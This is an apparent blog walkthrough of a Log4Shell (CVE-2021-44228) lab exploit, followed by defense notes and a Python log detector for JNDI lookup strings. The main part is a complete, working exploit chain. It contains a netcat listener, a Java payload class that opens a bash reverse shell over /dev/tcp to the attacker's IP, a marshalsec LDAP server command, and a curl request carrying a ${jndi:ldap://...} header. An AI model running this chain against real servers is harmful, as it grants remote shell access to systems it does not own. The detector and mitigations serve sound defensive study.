Achieving a Reverse Shell via Log4Shell: Controlled Exploitation Walkthrough
CRUD5th-273- @crud5th-273-

Publish Date: Mar 30

Log4Shell (CVE-2021-44228) is notorious for its ability to enable unauthenticated remote code execution (RCE) — but more critically, it allows full reverse shell control when weaponized properly.

In this article, we’ll reproduce a complete Log4Shell-to-shell chain using a safe local lab.


Lab Objective

Trigger a reverse shell from a vulnerable Log4j instance to an attacker-controlled machine via JNDI LDAP exploitation.

Lab Setup:

  • Vulnerable Java app (Log4j ≤ 2.14.1)
  • Malicious LDAP server (marshalsec)
  • Attacker listener (netcat)

1. Prepare the Listener

Start a reverse shell listener on your attacking machine:

nc -lvnp 4444

2. Create Exploit Class (Reverse Shell Payload)

Write a Java payload that connects back to the listener:

import java.io.IOException;
public class Exploit {
    static {
        try {
            String[] cmd = {"/bin/bash", "-c", "bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1"};
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Compile and serve via HTTP:

javac Exploit.java
python3 -m http.server 8000

3. Run Malicious LDAP Server

Serve the class reference via marshalsec:

java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer \
  "http://<attacker-ip>:8000/#Exploit"

4. Trigger the Exploit

Send the crafted payload to the vulnerable Log4j endpoint:

curl http://<target-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<attacker-ip>:1389/Exploit}'

5. Confirm Reverse Shell

If successful, the listener should receive a connection:

whoami
hostname

6. Defense Notes

  • Restrict outbound traffic (egress filtering)
  • Disable message lookups (-Dlog4j2.formatMsgNoLookups=true) as a stopgap, and upgrade Log4j to a patched release
  • Use JVM SecurityManager or sandboxing
  • Monitor for suspicious DNS/LDAP outbound patterns
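For the monitoring bullet, here is a small log detector, added as an example and not part of the original lab, that flags the lookup pattern used in step 4 in HTTP access-log lines. Log4j resolves the innermost ${...} lookup first, so the detector collapses nested lookups (lower/upper and the ":-" default syntax) before matching; a detector that only greps for the literal string ${jndi: misses values that Log4j would still expand. The log lines and the 203.0.113.10 address are constructed samples.

```python
import re

# Innermost lookup: a ${...} whose body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we want to see once nesting is collapsed.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Constructed access-log lines (203.0.113.10 is from the documentation range).
SAMPLE_LOG = [
    '10.0.0.5 "GET / HTTP/1.1" 200 ua="curl/7.81" x_api_version="1.2.3"',
    '10.0.0.9 "GET / HTTP/1.1" 200 ua="curl/7.81" '
    'x_api_version="${jndi:ldap://203.0.113.10:1389/Exploit}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 '
    'ua="${${lower:J}ndi:ldap://203.0.113.10:1389/a}" x_api_version="1.2.3"',
]


def _resolve(m: re.Match) -> str:
    """Substitute one innermost lookup the way Log4j's StrSubstitutor would."""
    body = m.group(1)
    if ":-" in body:                 # ${name:-default}: unresolvable name -> default
        return body.split(":-", 1)[1]
    name, _, arg = body.partition(":")
    name = name.lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return m.group(0)                # unknown lookup (jndi, env, ...): leave literal


def normalize(text: str) -> str:
    """Collapse nested lookups until the text stops changing (bounded)."""
    for _ in range(10):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(value: str) -> bool:
    return bool(_JNDI.search(normalize(value)))


def scan(lines):
    """Return (line_number, normalized_line) for each line carrying a JNDI lookup."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if is_jndi_lookup(l)]


if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Run it against real access logs only where the application actually logs request headers; the detector sees nothing a web server does not write down.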

Final Thoughts

This lab demonstrates how a seemingly benign logging library can become a full-fledged entrypoint for remote shell access.

Mastering the end-to-end chain — from vector to payload delivery to shell — is essential for both offensive research and hardened defense.

Next: we’ll capture this exploit in real-time using tcpdump and correlate it with JVM behavior for deep forensic insights.
